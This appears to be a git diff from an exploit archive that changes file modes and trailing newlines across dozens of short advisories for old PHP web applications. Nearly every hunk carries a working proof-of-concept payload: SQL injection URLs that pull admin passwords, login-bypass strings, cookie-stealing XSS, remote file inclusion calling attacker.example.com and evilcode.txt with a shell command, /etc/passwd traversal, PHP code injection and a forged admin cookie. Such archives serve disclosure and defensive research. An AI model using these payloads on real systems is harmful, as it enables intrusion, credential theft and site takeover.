MyBB 1.0 is reportedly vulnerable. -string expcookie="imei'" //garbrage field that actually is not an uid + an inject sign +" union select '1' as uid," //return no admin union our sniffed admin +" '','','','xxx'as loginkey ,"//we have not any info! so null them; only login key cheked that we fill with xxx +" '','','','',"//null fields befor usergroup +" 4 as usergroup";// ok! our sniffed admin is an admin : D !! for (int i=0;i< 49;i++) expcookie+=",''"; //null all of other fields!expcookie+="-- imei" // remark rest of SQL +"_xxx" ; \ No newline at end of file +string expcookie="imei'" //garbrage field that actually is not an uid + an inject sign +" union select '1' as uid," //return no admin union our sniffed admin +" '','','','xxx'as loginkey ,"//we have not any info! so null them; only login key cheked that we fill with xxx +" '','','','',"//null fields befor usergroup +" 4 as usergroup";// ok! our sniffed admin is an admin : D !! for (int i=0;i< 49;i++) expcookie+=",''"; //null all of other fields!expcookie+="-- imei" // remark rest of SQL +"_xxx" ; \ No newline at end of file diff --git a/platforms/php/webapps/26992.txt b/platforms/php/webapps/26992.txt old mode 100755 new mode 100644 index 45ab06eae..b0f30a3c3 --- a/platforms/php/webapps/26992.txt +++ b/platforms/php/webapps/26992.txt @@ -4,4 +4,4 @@ Ades Design AdesGuestbook is prone to a cross-site scripting vulnerability becau An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. -/read.php?pageNum_rsRead=1&totalRows_rsRead=[XSS] \ No newline at end of file +/read.php?pageNum_rsRead=1&totalRows_rsRead=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/26993.txt b/platforms/php/webapps/26993.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26994.txt b/platforms/php/webapps/26994.txt old mode 100755 new mode 100644 index aad13d578..ea9b6149f --- a/platforms/php/webapps/26994.txt +++ b/platforms/php/webapps/26994.txt @@ -7,4 +7,4 @@ An attacker may leverage these issues to have arbitrary script code executed in These issues affect versions 3.00.26 and prior. http://www.example.com/index.php?_m=downloads&_a=view& -parentcategoryid=3&pcid=1&nav=[XSS] \ No newline at end of file +parentcategoryid=3&pcid=1&nav=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/26995.txt b/platforms/php/webapps/26995.txt old mode 100755 new mode 100644 index 5de491fb2..b2af674e4 --- a/platforms/php/webapps/26995.txt +++ b/platforms/php/webapps/26995.txt @@ -4,4 +4,4 @@ phpDocumentor is prone to a cross-site scripting vulnerability. This issue is du An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/[path]/Documentation/tests/bug-559668.php?FORUM[LIB]=<script>alert(document.cookie)</script> \ No newline at end of file +http://www.example.com/[path]/Documentation/tests/bug-559668.php?FORUM[LIB]=<script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/26998.txt b/platforms/php/webapps/26998.txt old mode 100755 new mode 100644 index 4d31910d5..0f09f73b3 --- a/platforms/php/webapps/26998.txt +++ b/platforms/php/webapps/26998.txt @@ -4,4 +4,4 @@ The oaBoard application is prone to a remote file-include vulnerability. As a re This could result in the execution of arbitrary PHP code in the context of the webserver hosting the application. -http://oaboard.example.com/oaboard_en/forum.php?inc=http://attacker.example.com/code.php \ No newline at end of file +http://oaboard.example.com/oaboard_en/forum.php?inc=http://attacker.example.com/code.php \ No newline at end of file diff --git a/platforms/php/webapps/26999.txt b/platforms/php/webapps/26999.txt old mode 100755 new mode 100644 index 26555dcdb..dd0154926 --- a/platforms/php/webapps/26999.txt +++ b/platforms/php/webapps/26999.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/16106/info phpBook is prone to a vulnerability that may let remote attackers inject arbitrary PHP code into the application. This code may then be executed by visiting pages that include the injected code. -E-mail field: qwe@<? anyphpcode(); ?>.com \ No newline at end of file +E-mail field: qwe@<? anyphpcode(); ?>.com \ No newline at end of file diff --git a/platforms/php/webapps/27000.txt b/platforms/php/webapps/27000.txt old mode 100755 new mode 100644 index e0dfa9980..2a3528838 --- a/platforms/php/webapps/27000.txt +++ b/platforms/php/webapps/27000.txt @@ -17,4 +17,4 @@ For version 1.26: http://www.example.com/webforum/index.php? theme_id=-1% 20union%20select% 201,2,name, 4,5%20from% 20vwf_users% 20where%20userid=1/* Earlier versions: -http://www.example.com/temp/_1/webforum/index.php? theme_id=-1% 20union%20select% 201,2,pass, 4%20from%20vwf_users% 20where%20userid=1/* \ No newline at end of file +http://www.example.com/temp/_1/webforum/index.php? theme_id=-1% 20union%20select% 201,2,pass, 4%20from%20vwf_users% 20where%20userid=1/* \ No newline at end of file diff --git a/platforms/php/webapps/27001.txt b/platforms/php/webapps/27001.txt old mode 100755 new mode 100644 index 85af630a1..1c8b6aff8 --- a/platforms/php/webapps/27001.txt +++ b/platforms/php/webapps/27001.txt @@ -7,4 +7,4 @@ Successful exploitation could result in a compromise of the application, disclos http://www.example.com/links/login.php username: a' or 'a'='a'/* -password: anypassword \ No newline at end of file +password: anypassword \ No newline at end of file diff --git a/platforms/php/webapps/27002.txt b/platforms/php/webapps/27002.txt old mode 100755 new mode 100644 index 71b8dedad..7a4b97546 --- a/platforms/php/webapps/27002.txt +++ b/platforms/php/webapps/27002.txt @@ -4,4 +4,4 @@ Jevontech PHPenpals is prone to an SQL injection vulnerability. This issue is du Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/phpenpals/profile.php?personalID=999%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,password,14%20from%20admin/* \ No newline at end of file +http://www.example.com/phpenpals/profile.php?personalID=999%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,password,14%20from%20admin/* \ No newline at end of file diff --git a/platforms/php/webapps/27003.txt b/platforms/php/webapps/27003.txt old mode 100755 new mode 100644 index f58ab3088..1f08dd95d --- a/platforms/php/webapps/27003.txt +++ b/platforms/php/webapps/27003.txt @@ -7,4 +7,4 @@ Successful exploitation could result in a compromise of the application, disclos http://www.example.com/index.php username: a' or 'a'='a'/* -password: anypassword \ No newline at end of file +password: anypassword \ No newline at end of file diff --git a/platforms/php/webapps/27004.txt b/platforms/php/webapps/27004.txt old mode 100755 new mode 100644 index 913e101c1..b7d1b1989 --- a/platforms/php/webapps/27004.txt +++ b/platforms/php/webapps/27004.txt @@ -4,4 +4,4 @@ PHPjournaler is prone to an SQL injection vulnerability. This issue is due to a Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/phpjournaler/index.php?readold=999%20union%20select%201,password,3,4,name,6%20from%20Users/* \ No newline at end of file +http://www.example.com/phpjournaler/index.php?readold=999%20union%20select%201,password,3,4,name,6%20from%20Users/* \ No newline at end of file diff --git a/platforms/php/webapps/27009.txt b/platforms/php/webapps/27009.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2701.txt b/platforms/php/webapps/2701.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27015.txt b/platforms/php/webapps/27015.txt old mode 100755 new mode 100644 index 093c0934a..99132a02c --- a/platforms/php/webapps/27015.txt +++ b/platforms/php/webapps/27015.txt @@ -7,4 +7,4 @@ Attacker-supplied HTML and script code would be executed in the context of the a Add an entry form: http://www.example.com/guestbook/addentry.php -Homepage value: '></a><script>alert(123);</script> \ No newline at end of file +Homepage value: '></a><script>alert(123);</script> \ No newline at end of file diff --git a/platforms/php/webapps/27016.txt b/platforms/php/webapps/27016.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27017.txt b/platforms/php/webapps/27017.txt old mode 100755 new mode 100644 index 2000dfd60..27998eb67 --- a/platforms/php/webapps/27017.txt +++ b/platforms/php/webapps/27017.txt @@ -4,4 +4,4 @@ Chimera Web Portal is prone to multiple input validation vulnerabilities. The is Successful exploitation of these vulnerabilities could result in a compromise of the application, disclosure or modification of data, the theft of cookie-based authentication credentials. They may also permit an attacker to exploit vulnerabilities in the underlying database implementation as well as other attacks. -http://www.example.com/chimera/linkcategory.php?id=9999'%20union%20select%20admin_password%20from%20admin/* \ No newline at end of file +http://www.example.com/chimera/linkcategory.php?id=9999'%20union%20select%20admin_password%20from%20admin/* \ No newline at end of file diff --git a/platforms/php/webapps/27018.txt b/platforms/php/webapps/27018.txt old mode 100755 new mode 100644 index 3ca552842..c3e4165e8 --- a/platforms/php/webapps/27018.txt +++ b/platforms/php/webapps/27018.txt @@ -7,4 +7,4 @@ Successful exploitation could result in a compromise of the application, disclos http://www.example.com/auth.php username: a' or 'a'='a'/* -password: anypassword \ No newline at end of file +password: anypassword \ No newline at end of file diff --git a/platforms/php/webapps/27019.txt b/platforms/php/webapps/27019.txt old mode 100755 new mode 100644 index e0837e29c..96205ad6a --- a/platforms/php/webapps/27019.txt +++ b/platforms/php/webapps/27019.txt @@ -8,4 +8,4 @@ This issue is reported to affect vBulletin 3.5.2. Earlier versions may also be a The following example was provided as Event Title input: -TITLE:--------->Test<script>alert(document.cookie)</script> \ No newline at end of file +TITLE:--------->Test<script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/2702.php b/platforms/php/webapps/2702.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27020.txt b/platforms/php/webapps/27020.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27022.txt b/platforms/php/webapps/27022.txt old mode 100755 new mode 100644 index 3550e736d..a1cbba426 --- a/platforms/php/webapps/27022.txt +++ b/platforms/php/webapps/27022.txt @@ -10,4 +10,4 @@ http://www.example.com/index.php?view=DevelopmentItemResultsView&devWherePair http://www.example.com/index.php?view=DevelopmentItemResultsView&where=project _id+%3D+%3F&orderBy=[SQL] -http://www.example.com/index.php?view=DevelopmentItemResultsView&where=[SQL] \ No newline at end of file +http://www.example.com/index.php?view=DevelopmentItemResultsView&where=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/27023.txt b/platforms/php/webapps/27023.txt old mode 100755 new mode 100644 index 4537c1c21..922a143d1 --- a/platforms/php/webapps/27023.txt +++ b/platforms/php/webapps/27023.txt @@ -8,4 +8,4 @@ http://www.example.com/index.php?view=AddToFavoriteItemSetView&ids%5B0%5D=[XSS] http://www.example.com/index.php?view=AddRelatedDevelopmentItemFormView&report_id=9&action=[XSS] http://www.example.com/index.php?view=AddRelatedDevelopmentItemFormView&report_id=[XSS] http://www.example.com/index.php?view=DevelopmentItemResultsView&devWherePair%5B0%5D=state_id+%3C+%3F++AND++MATCH+%28report%2Csubject%2Cdevelplan%2Cfixednotes%2Crepsteps%29+AGAINST+%28%3F++IN+BOOLEAN+MODE%29&devWherePair%5B1%5D%5B0%5D=240&devWherePair%5B1%5D%5B1%5D=[XSS] -http://www.example.com/index.php?view=DevelopmentItemResultsView&where=project_id+%3D+%3F&orderBy=priority_id+DESC&binds%5B0%5D=[XSS] \ No newline at end of file +http://www.example.com/index.php?view=DevelopmentItemResultsView&where=project_id+%3D+%3F&orderBy=priority_id+DESC&binds%5B0%5D=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/27025.txt b/platforms/php/webapps/27025.txt old mode 100755 new mode 100644 index 69d512b1b..9a9f99022 --- a/platforms/php/webapps/27025.txt +++ b/platforms/php/webapps/27025.txt @@ -7,4 +7,4 @@ Successful exploitation could result in a compromise of the application, disclos Version 1.0 and prior are affected; other versions may also be vulnerable. http://www.example.com/user.php?email=[SQL]&action=send-password-now -http://www.example.com/search.php?action=search&q=[SQL] \ No newline at end of file +http://www.example.com/search.php?action=search&q=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/27027.txt b/platforms/php/webapps/27027.txt old mode 100755 new mode 100644 index 85b22604c..8e45b872b --- a/platforms/php/webapps/27027.txt +++ b/platforms/php/webapps/27027.txt @@ -6,4 +6,4 @@ Successful exploitation could result in a compromise of the application, disclos Version 1.34 and prior are affected; other versions may also be vulnerable. -http://www.example.com/jax_calendar.php?Y=2005&m=11&d=15&cal_id=[SQL] \ No newline at end of file +http://www.example.com/jax_calendar.php?Y=2005&m=11&d=15&cal_id=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/27028.txt b/platforms/php/webapps/27028.txt old mode 100755 new mode 100644 index 85e4b1b4b..af91ad6d1 --- a/platforms/php/webapps/27028.txt +++ b/platforms/php/webapps/27028.txt @@ -5,4 +5,4 @@ LogicBill is prone to multiple SQL injection vulnerabilities. These issues are d Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. http://www.example.com/helpdesk.php?__mode=[SQL] -http://www.example.com/helpdesk.php?__mode=view&__id=[SQL] \ No newline at end of file +http://www.example.com/helpdesk.php?__mode=view&__id=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/27029.txt b/platforms/php/webapps/27029.txt old mode 100755 new mode 100644 index 4df834f75..1b86c3b3b --- a/platforms/php/webapps/27029.txt +++ b/platforms/php/webapps/27029.txt @@ -4,4 +4,4 @@ EZI is prone to an SQL injection vulnerability. This issue is due to a failure i Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/ezi/invoices.php?i=[SQL] \ No newline at end of file +http://www.example.com/ezi/invoices.php?i=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/2703.txt b/platforms/php/webapps/2703.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27030.txt b/platforms/php/webapps/27030.txt old mode 100755 new mode 100644 index 90baea8d6..61f4a84fb --- a/platforms/php/webapps/27030.txt +++ b/platforms/php/webapps/27030.txt @@ -5,4 +5,4 @@ CS-Cart is prone to multiple SQL injection vulnerabilities. These issues are due Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. http://www.example.com/index.php?target=products&mode=search&subcats=Y&type=extended&avail=Y&pshor=Y&pfull=Y&pname=Y&cid=0&q=&x=11&y=3&sort_by=[SQL] -http://www.example.com/index.php?target=products&mode=search&subcats=Y&type=extended&avail=Y&pshor=Y&pfull=Y&pname=Y&cid=0&q=%27&x=11&y=3&sort_by=product&sort_order=[SQL] \ No newline at end of file +http://www.example.com/index.php?target=products&mode=search&subcats=Y&type=extended&avail=Y&pshor=Y&pfull=Y&pname=Y&cid=0&q=%27&x=11&y=3&sort_by=product&sort_order=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/27033.txt b/platforms/php/webapps/27033.txt old mode 100755 new mode 100644 index b1a2bbd81..b8d48f741 --- a/platforms/php/webapps/27033.txt +++ b/platforms/php/webapps/27033.txt @@ -7,4 +7,4 @@ Successful exploitation of these vulnerabilities could result in a compromise of Foro Domus version 2.10 is vulnerable to these issues; other versions may also be affected. An example URI exploiting the cross-site scripting issue was provided: -http://www.example.com/domus/escribir.php?domus=ae29cf4d3f2dc42241e387d39b4126e2&hilo=1&padre=1&categoria=General&n=&usario=username&email=e@\';%20alert(123);%20var%20dss=\'h.co&asunto=blabla&texto=anytext&accion=enviar \ No newline at end of file +http://www.example.com/domus/escribir.php?domus=ae29cf4d3f2dc42241e387d39b4126e2&hilo=1&padre=1&categoria=General&n=&usario=username&email=e@\';%20alert(123);%20var%20dss=\'h.co&asunto=blabla&texto=anytext&accion=enviar \ No newline at end of file diff --git a/platforms/php/webapps/27037.txt b/platforms/php/webapps/27037.txt old mode 100755 new mode 100644 index b6ce10836..2d950b8a3 --- a/platforms/php/webapps/27037.txt +++ b/platforms/php/webapps/27037.txt @@ -12,4 +12,4 @@ Password: anypassword Get user's password hash example (SQL Injection): http://www.example.com/twf/login.php User Name: a' union select N,password, 3 from users/* -User name will contain password's hash of user with ID=N \ No newline at end of file +User name will contain password's hash of user with ID=N \ No newline at end of file diff --git a/platforms/php/webapps/27038.txt b/platforms/php/webapps/27038.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27039.txt b/platforms/php/webapps/27039.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2704.txt b/platforms/php/webapps/2704.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27048.txt b/platforms/php/webapps/27048.txt old mode 100755 new mode 100644 index 82750bea2..fdc38aab4 --- a/platforms/php/webapps/27048.txt +++ b/platforms/php/webapps/27048.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to execute arbitrary remote PHP code on an af This issue affects version 2.4.5; other versions may also be vulnerable. -http://www.example.com/appserv/main.php?appserv_root=http://www.example.com/ \ No newline at end of file +http://www.example.com/appserv/main.php?appserv_root=http://www.example.com/ \ No newline at end of file diff --git a/platforms/php/webapps/27052.txt b/platforms/php/webapps/27052.txt old mode 100755 new mode 100644 index 916dcb421..5e262e20d --- a/platforms/php/webapps/27052.txt +++ b/platforms/php/webapps/27052.txt @@ -6,4 +6,4 @@ Successful exploitation could result in a compromise of the application, disclos This issue affects versions 2.2 and 2.2.1; other versions may also be vulnerable. -http://www.example.com/bb427/showthread.php?ForumID=999%20union%20select%20UserName,Passwrod,null,null%20from%20prefPersonal \ No newline at end of file +http://www.example.com/bb427/showthread.php?ForumID=999%20union%20select%20UserName,Passwrod,null,null%20from%20prefPersonal \ No newline at end of file diff --git a/platforms/php/webapps/27053.txt b/platforms/php/webapps/27053.txt old mode 100755 new mode 100644 index 2b393b466..478b050bd --- a/platforms/php/webapps/27053.txt +++ b/platforms/php/webapps/27053.txt @@ -4,4 +4,4 @@ Venom Board is prone to multiple SQL injection vulnerabilities. These issues are Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/venomboard/forum/post.php3?topic_id=999%20union%20select%201,2,3,4,5,6,7/* \ No newline at end of file +http://www.example.com/venomboard/forum/post.php3?topic_id=999%20union%20select%201,2,3,4,5,6,7/* \ No newline at end of file diff --git a/platforms/php/webapps/27054.txt b/platforms/php/webapps/27054.txt old mode 100755 new mode 100644 index 9fdc7c421..0bf3998b6 --- a/platforms/php/webapps/27054.txt +++ b/platforms/php/webapps/27054.txt @@ -9,4 +9,4 @@ This issue affects version 2.2 and 2.2.1; other versions may also be vulnerable. The following demonstrates cookie-data sufficient to exploit this issue: username=admin; authenticated=1; -usertype=admin; \ No newline at end of file +usertype=admin; \ No newline at end of file diff --git a/platforms/php/webapps/27058.txt b/platforms/php/webapps/27058.txt old mode 100755 new mode 100644 index f1fbed89d..96f202fc4 --- a/platforms/php/webapps/27058.txt +++ b/platforms/php/webapps/27058.txt @@ -11,4 +11,4 @@ Example proof-of-concept code has been provided: navigate to http://www.example.com/modules.php?name=Search and type in -s%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/* \ No newline at end of file +s%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/* \ No newline at end of file diff --git a/platforms/php/webapps/27059.txt b/platforms/php/webapps/27059.txt old mode 100755 new mode 100644 index 951dfbf3d..f35b72833 --- a/platforms/php/webapps/27059.txt +++ b/platforms/php/webapps/27059.txt @@ -18,4 +18,4 @@ IP: ' .$ip. ' Date and Time: ' .$date. ' Referer: '.$referer.' '); fclose($fp); -?> \ No newline at end of file +?> \ No newline at end of file diff --git a/platforms/php/webapps/2706.txt b/platforms/php/webapps/2706.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27060.txt b/platforms/php/webapps/27060.txt old mode 100755 new mode 100644 index bb55fba88..21370e912 --- a/platforms/php/webapps/27060.txt +++ b/platforms/php/webapps/27060.txt @@ -18,4 +18,4 @@ IP: ' .$ip. ' Date and Time: ' .$date. ' Referer: '.$referer.' '); fclose($fp); -?> \ No newline at end of file +?> \ No newline at end of file diff --git a/platforms/php/webapps/27064.txt b/platforms/php/webapps/27064.txt old mode 100755 new mode 100644 index ad0e24148..636203ab2 --- a/platforms/php/webapps/27064.txt +++ b/platforms/php/webapps/27064.txt @@ -4,4 +4,4 @@ Orjinweb is prone to a remote file include vulnerability. This issue is due to a An attacker can exploit this issue to execute arbitrary remote PHP code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access. -http://www.example.com/?page=http://www.example.com/evilcode.txt?&cmd=uname -a \ No newline at end of file +http://www.example.com/?page=http://www.example.com/evilcode.txt?&cmd=uname -a \ No newline at end of file diff --git a/platforms/php/webapps/27067.txt b/platforms/php/webapps/27067.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27068.txt b/platforms/php/webapps/27068.txt old mode 100755 new mode 100644 index 0f89241b4..09eebae4b --- a/platforms/php/webapps/27068.txt +++ b/platforms/php/webapps/27068.txt @@ -5,4 +5,4 @@ MyPhPim is prone to multiple input validation vulnerabilities. These issues are Successful exploitation of these vulnerabilities could result in a compromise of the application, disclosure or modification of data, the theft of cookie-based authentication credentials. They may also permit an attacker to exploit vulnerabilities in the underlying database implementation as well as other attacks. login: [first registered user] -pass: a") or "a"="a"/* \ No newline at end of file +pass: a") or "a"="a"/* \ No newline at end of file diff --git a/platforms/php/webapps/2707.php b/platforms/php/webapps/2707.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27070.txt b/platforms/php/webapps/27070.txt old mode 100755 new mode 100644 index 002cfa128..419327255 --- a/platforms/php/webapps/27070.txt +++ b/platforms/php/webapps/27070.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to have arbitrary script code executed in th TrackPoint NX versions less than 0.1 are reported to be vulnerable. -http://www.example.com/[tpointdir]/index.php?Page=login&Action=Login&username=[XSS] \ No newline at end of file +http://www.example.com/[tpointdir]/index.php?Page=login&Action=Login&username=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/27075.txt b/platforms/php/webapps/27075.txt old mode 100755 new mode 100644 index dcc8f279d..838b4a4aa --- a/platforms/php/webapps/27075.txt +++ b/platforms/php/webapps/27075.txt @@ -4,4 +4,4 @@ TankLogger is prone to multiple SQL injection vulnerabilities. These issues are Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/exp/tanklogger/showInfo.php? livestock_id=99'% 20union%20select% 201,2,3,4,5, 6,7,8,9/* \ No newline at end of file +http://www.example.com/exp/tanklogger/showInfo.php? livestock_id=99'% 20union%20select% 201,2,3,4,5, 6,7,8,9/* \ No newline at end of file diff --git a/platforms/php/webapps/27077.txt b/platforms/php/webapps/27077.txt old mode 100755 new mode 100644 index 23fb7b5e0..eb9edf416 --- a/platforms/php/webapps/27077.txt +++ b/platforms/php/webapps/27077.txt @@ -8,4 +8,4 @@ For the HTML injection vulnerability, ttacker-supplied HTML and script code woul http://www.example.com/calendar.php?show=full_month&s=1&submit=GO&day=[XSS] -http://www.example.com/search.php post this code <script>alert('night_warrior');</script> \ No newline at end of file +http://www.example.com/search.php post this code <script>alert('night_warrior');</script> \ No newline at end of file diff --git a/platforms/php/webapps/27078.txt b/platforms/php/webapps/27078.txt old mode 100755 new mode 100644 index 25bda5e42..b29d11624 --- a/platforms/php/webapps/27078.txt +++ b/platforms/php/webapps/27078.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary code in the browser of The discoverer of this vulnerability did not specify which version of this application is vulnerable. -http://www.example.com/template/fullview.php?tempid=[XSS] \ No newline at end of file +http://www.example.com/template/fullview.php?tempid=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/27080.txt b/platforms/php/webapps/27080.txt old mode 100755 new mode 100644 index a24669a4b..6e97e80f9 --- a/platforms/php/webapps/27080.txt +++ b/platforms/php/webapps/27080.txt @@ -7,4 +7,4 @@ An attacker can exploit this issue to execute arbitrary malicious PHP code and e ezDatabase version 2.0 is vulnerable to these issues; other versions may also be affected. http://www.example.com/visitorupload.php?db_id=;phpinfo() -http://www.example.com/visitorupload.php?db_id=;include(_GET[test])&test=http://www.example2.com/script.php \ No newline at end of file +http://www.example.com/visitorupload.php?db_id=;include(_GET[test])&test=http://www.example2.com/script.php \ No newline at end of file diff --git a/platforms/php/webapps/27084.txt b/platforms/php/webapps/27084.txt old mode 100755 new mode 100644 index 2a9dbe860..53345e5e0 --- a/platforms/php/webapps/27084.txt +++ b/platforms/php/webapps/27084.txt @@ -7,4 +7,4 @@ Successful exploitation could result in a compromise of the application, disclos The following proof of concept is available: http://www.example.com/admin/index.php User Name: a' or 1/* -Password: a' or 1/* \ No newline at end of file +Password: a' or 1/* \ No newline at end of file diff --git a/platforms/php/webapps/27085.txt b/platforms/php/webapps/27085.txt old mode 100755 new mode 100644 index 05463f7f8..19fb25b3f --- a/platforms/php/webapps/27085.txt +++ b/platforms/php/webapps/27085.txt @@ -5,4 +5,4 @@ Bit 5 Blog is prone to an HTML injection vulnerability. This issue is due to a f Attacker-supplied HTML and script code would be executed in the context of the affected Web site, potentially allowing for theft of cookie-based authentication credentials. An attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible. The following proof of concept is available: -<a href=javascript:alert(123)>clickme</a> \ No newline at end of file +<a href=javascript:alert(123)>clickme</a> \ No newline at end of file diff --git a/platforms/php/webapps/27086.txt b/platforms/php/webapps/27086.txt old mode 100755 new mode 100644 index fecd5f804..23f2347ed --- a/platforms/php/webapps/27086.txt +++ b/platforms/php/webapps/27086.txt @@ -6,4 +6,4 @@ Successful exploitation could result in a compromise of the application, disclos An example URI has been provided: -http://www.example.com/folder/pictures.php?dir=[SQL] \ No newline at end of file +http://www.example.com/folder/pictures.php?dir=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/27087.txt b/platforms/php/webapps/27087.txt old mode 100755 new mode 100644 index 38ab90cdf..daa50425f --- a/platforms/php/webapps/27087.txt +++ b/platforms/php/webapps/27087.txt @@ -5,4 +5,4 @@ geoBlog is prone to an SQL injection vulnerability. This issue is due to a failu Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. The following proof of concept URI is available: -http://www.example.com/geoblog/viewcat.php?cat=I'%20union%20select%201,2,3,4,5,6,7/* \ No newline at end of file +http://www.example.com/geoblog/viewcat.php?cat=I'%20union%20select%201,2,3,4,5,6,7/* \ No newline at end of file diff --git a/platforms/php/webapps/2709.txt b/platforms/php/webapps/2709.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27092.txt b/platforms/php/webapps/27092.txt old mode 100755 new mode 100644 index 9a19a419a..a9b6753b0 --- a/platforms/php/webapps/27092.txt +++ b/platforms/php/webapps/27092.txt @@ -5,4 +5,4 @@ GTP iCommerce is prone to multiple cross-site scripting vulnerabilities. An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. http://www.example.com/index.php?page=listStory&cat=Programs+and+Services&subcat=[code] -http://www.example.com/index.php?page=listStory&cat=[code] \ No newline at end of file +http://www.example.com/index.php?page=listStory&cat=[code] \ No newline at end of file diff --git a/platforms/php/webapps/27093.txt b/platforms/php/webapps/27093.txt old mode 100755 new mode 100644 index 98e98768d..c63af5c6b --- a/platforms/php/webapps/27093.txt +++ b/platforms/php/webapps/27093.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to have arbitrary script code executed in th Versions less than 2.1.2 are reported to be affected; other versions may also be vulnerable. -http://www.example.com/index.php?db_id=1&cat_id=1&display=30&p=%3Cscript%3Ealert(document.cookie)%3C/script%3E&rowstart=90 \ No newline at end of file +http://www.example.com/index.php?db_id=1&cat_id=1&display=30&p=%3Cscript%3Ealert(document.cookie)%3C/script%3E&rowstart=90 \ No newline at end of file diff --git a/platforms/php/webapps/27097.txt b/platforms/php/webapps/27097.txt old mode 100755 new mode 100644 index 038fdedd4..b23cfcad5 --- a/platforms/php/webapps/27097.txt +++ b/platforms/php/webapps/27097.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability to retrieve arbitrary files from the Version 0.9.33 is vulnerable; other versions may also be affected. -http://www.example.com/phpXplorer/system/workspaces.php?sShare=../../../../../../../../etc/passwd%00&ref=1 \ No newline at end of file +http://www.example.com/phpXplorer/system/workspaces.php?sShare=../../../../../../../../etc/passwd%00&ref=1 \ No newline at end of file diff --git a/platforms/php/webapps/27098.txt b/platforms/php/webapps/27098.txt old mode 100755 new mode 100644 index d05203df9..dfebd618d --- a/platforms/php/webapps/27098.txt +++ b/platforms/php/webapps/27098.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to have arbitrary script code executed in th Version 1.1.0-3 is vulnerable; other versions may also be affected. -http://www.example.com/rkrt_stats.php?refs,,Last_7,0,">[code] \ No newline at end of file +http://www.example.com/rkrt_stats.php?refs,,Last_7,0,">[code] \ No newline at end of file diff --git a/platforms/php/webapps/27099.txt b/platforms/php/webapps/27099.txt old mode 100755 new mode 100644 index a8754a4f3..aca0763d7 --- a/platforms/php/webapps/27099.txt +++ b/platforms/php/webapps/27099.txt @@ -7,4 +7,4 @@ Successful exploitation could result in a compromise of the application, disclos The following proof of concept is available: http://www.example.com/index.php?act=login username: a' or 1/* -password: anypassword \ No newline at end of file +password: anypassword \ No newline at end of file diff --git a/platforms/php/webapps/2710.txt b/platforms/php/webapps/2710.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27100.txt b/platforms/php/webapps/27100.txt old mode 100755 new mode 100644 index 94c90d9dc..24f634d67 --- a/platforms/php/webapps/27100.txt +++ b/platforms/php/webapps/27100.txt @@ -4,4 +4,4 @@ microBlog is prone to multiple SQL injection vulnerabilities. These issues are d Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/microblog/index.php?month=1&year=9999%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14/* \ No newline at end of file 